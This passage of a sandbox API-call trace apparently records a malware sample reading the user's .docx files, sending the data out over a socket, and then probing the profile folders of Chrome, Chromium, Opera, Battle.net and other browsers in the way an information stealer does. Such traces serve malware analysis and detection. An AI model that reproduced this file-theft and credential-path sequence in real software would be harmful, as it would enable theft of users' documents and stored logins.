out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0280.126] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", nBufferLength=0x105, lpBuffer=0x43e628, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", lpFilePart=0x0) returned 0x31 [0280.126] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", nBufferLength=0x105, lpBuffer=0x43e5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", lpFilePart=0x0) returned 0x31 [0280.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e83c) returned 1 [0280.126] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\t6gw4d_mtgvoesu.docx"), fInfoLevelId=0x0, lpFileInformation=0x43eb00 | out: lpFileInformation=0x43eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x770dc980, ftCreationTime.dwHighDateTime=0x1d7689f, ftLastAccessTime.dwLowDateTime=0x3786f610, ftLastAccessTime.dwHighDateTime=0x1d779a7, ftLastWriteTime.dwLowDateTime=0x3786f610, ftLastWriteTime.dwHighDateTime=0x1d779a7, nFileSizeHigh=0x0, nFileSizeLow=0x12cd8)) returned 1 [0280.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e838) returned 1 [0280.127] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", nBufferLength=0x105, lpBuffer=0x43e540, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", lpFilePart=0x0) returned 0x31 [0280.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea58) returned 1 [0280.127] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\t6gw4d_mtgvoesu.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0280.127] GetFileType (hFile=0x480) returned 0x1 [0280.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea54) returned 1 [0280.127] GetFileType (hFile=0x480) returned 0x1 [0280.128] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.129] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.130] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.131] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.132] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.132] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.133] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.133] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.134] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.134] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.135] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.135] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.136] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.136] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.137] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.138] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.138] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.139] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.139] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0xcd8, lpOverlapped=0x0) returned 1 [0280.140] ReadFile (in: hFile=0x480, lpBuffer=0x28c66b8, nNumberOfBytesToRead=0x328, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c66b8*, lpNumberOfBytesRead=0x43eac4*=0x0, lpOverlapped=0x0) returned 1 [0280.140] ReadFile (in: hFile=0x480, lpBuffer=0x28c724c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x28c724c*, lpNumberOfBytesRead=0x43eac4*=0x0, lpOverlapped=0x0) returned 1 [0280.145] CloseHandle (hObject=0x480) returned 1 [0280.146] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", nBufferLength=0x105, lpBuffer=0x43e63c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", lpFilePart=0x0) returned 0x31 [0280.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e8c8) returned 1 [0280.146] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\w0tv7enecko 9vk.docx"), fInfoLevelId=0x0, lpFileInformation=0x2902444 | out: lpFileInformation=0x2902444*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94fade60, ftCreationTime.dwHighDateTime=0x1d7a2dd, ftLastAccessTime.dwLowDateTime=0xd6fc5590, ftLastAccessTime.dwHighDateTime=0x1d7c4a8, ftLastWriteTime.dwLowDateTime=0xd6fc5590, ftLastWriteTime.dwHighDateTime=0x1d7c4a8, nFileSizeHigh=0x0, nFileSizeLow=0x660b)) returned 1 [0280.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e8c4) returned 1 [0280.147] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x43e630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0280.147] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", nBufferLength=0x105, lpBuffer=0x43e628, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", lpFilePart=0x0) returned 0x31 [0280.147] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", nBufferLength=0x105, lpBuffer=0x43e5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", lpFilePart=0x0) returned 0x31 [0280.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e83c) returned 1 [0280.147] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\w0tv7enecko 9vk.docx"), fInfoLevelId=0x0, lpFileInformation=0x43eb00 | out: lpFileInformation=0x43eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94fade60, ftCreationTime.dwHighDateTime=0x1d7a2dd, ftLastAccessTime.dwLowDateTime=0xd6fc5590, ftLastAccessTime.dwHighDateTime=0x1d7c4a8, ftLastWriteTime.dwLowDateTime=0xd6fc5590, ftLastWriteTime.dwHighDateTime=0x1d7c4a8, nFileSizeHigh=0x0, nFileSizeLow=0x660b)) returned 1 [0280.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e838) returned 1 [0280.148] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", nBufferLength=0x105, lpBuffer=0x43e540, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", lpFilePart=0x0) returned 0x31 [0280.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea58) returned 1 [0280.148] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\w0tv7enecko 9vk.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0280.149] GetFileType (hFile=0x480) returned 0x1 [0280.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea54) returned 1 [0280.149] GetFileType (hFile=0x480) returned 0x1 [0280.150] ReadFile (in: hFile=0x480, lpBuffer=0x2903744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2903744*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.151] ReadFile (in: hFile=0x480, lpBuffer=0x2903744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2903744*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.152] ReadFile (in: hFile=0x480, lpBuffer=0x2903744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2903744*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.153] ReadFile (in: hFile=0x480, lpBuffer=0x2903744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2903744*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.153] ReadFile (in: hFile=0x480, lpBuffer=0x2903744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2903744*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.153] ReadFile (in: hFile=0x480, lpBuffer=0x2903744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2903744*, lpNumberOfBytesRead=0x43eac4*=0x1000, lpOverlapped=0x0) returned 1 [0280.154] ReadFile (in: hFile=0x480, lpBuffer=0x2903744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2903744*, lpNumberOfBytesRead=0x43eac4*=0x60b, lpOverlapped=0x0) returned 1 [0280.155] ReadFile (in: hFile=0x480, lpBuffer=0x2902ce3, nNumberOfBytesToRead=0x1f5, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2902ce3*, lpNumberOfBytesRead=0x43eac4*=0x0, lpOverlapped=0x0) returned 1 [0280.155] ReadFile (in: hFile=0x480, lpBuffer=0x2903744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x43eac4, lpOverlapped=0x0 | out: lpBuffer=0x2903744*, lpNumberOfBytesRead=0x43eac4*=0x0, lpOverlapped=0x0) returned 1 [0280.157] CloseHandle (hObject=0x480) returned 1 [0280.161] CoCreateGuid (in: pguid=0x43e86c | out: pguid=0x43e86c*(Data1=0x790294c2, Data2=0x14c1, Data3=0x4c8e, Data4=([0]=0x9c, [1]=0x98, [2]=0x40, [3]=0xc, [4]=0x6, [5]=0xbb, [6]=0xb0, [7]=0xdb))) returned 0x0 [0280.161] CoCreateGuid (in: pguid=0x43e7b0 | out: pguid=0x43e7b0*(Data1=0x50991a58, Data2=0xa088, Data3=0x4084, Data4=([0]=0x8a, [1]=0xdb, [2]=0x9, [3]=0x52, [4]=0xa6, [5]=0x99, [6]=0x7e, [7]=0xd9))) returned 0x0 [0280.206] send (s=0x264, buf=0x36b9ede*, len=65536, flags=0) returned 65536 [0280.207] send (s=0x264, buf=0x36c9ede*, len=65536, flags=0) returned 65536 [0280.377] send (s=0x264, buf=0x36d9ede*, len=65536, flags=0) returned 65536 [0280.471] send (s=0x264, buf=0x36e9ede*, len=65536, flags=0) returned 65536 [0280.520] send (s=0x264, buf=0x36f9ede*, len=65536, flags=0) returned 65536 [0280.588] send (s=0x264, buf=0x3709ede*, len=47716, flags=0) returned 47716 [0280.651] recv (in: s=0x264, buf=0x267e0bc, len=8192, flags=0 | out: buf=0x267e0bc*) returned 128 [0280.837] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.837] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Battle.net", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net") returned 0x2c [0280.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.851] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net", lpFilePart=0x0) returned 0x2b [0280.851] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.854] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.854] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromium\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data") returned 0x34 [0280.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.854] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data", lpFilePart=0x0) returned 0x33 [0280.854] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.856] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.856] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x39 [0280.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.856] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data", lpFilePart=0x0) returned 0x38 [0280.857] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.866] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.866] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data") returned 0x3e [0280.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.866] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpFilePart=0x0) returned 0x3d [0280.867] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.869] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.869] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Opera Software\\", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\") returned 0x33 [0280.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.869] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\", lpFilePart=0x0) returned 0x32 [0280.870] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.872] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.872] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data") returned 0x42 [0280.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.872] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpFilePart=0x0) returned 0x41 [0280.872] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.874] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.874] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Iridium\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data") returned 0x33 [0280.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.875] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data", lpFilePart=0x0) returned 0x32 [0280.875] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7ac) returned 1 [0280.877] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0280.877] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\7Star\\7Star\\User Data", lpDst=0x43e9a4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data") returned 0x37 [0280.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea3c) returned 1 [0280.878] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data", nBufferLength=0x105, lpBuffer=0x43e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data", lpFilePart=0x0) returned 0x36 [0280.878] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data\\*", lpFindFileData=0x43e7ec | out: lpFindFileData=0x43e7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0280.878] SetThreadErrorMode 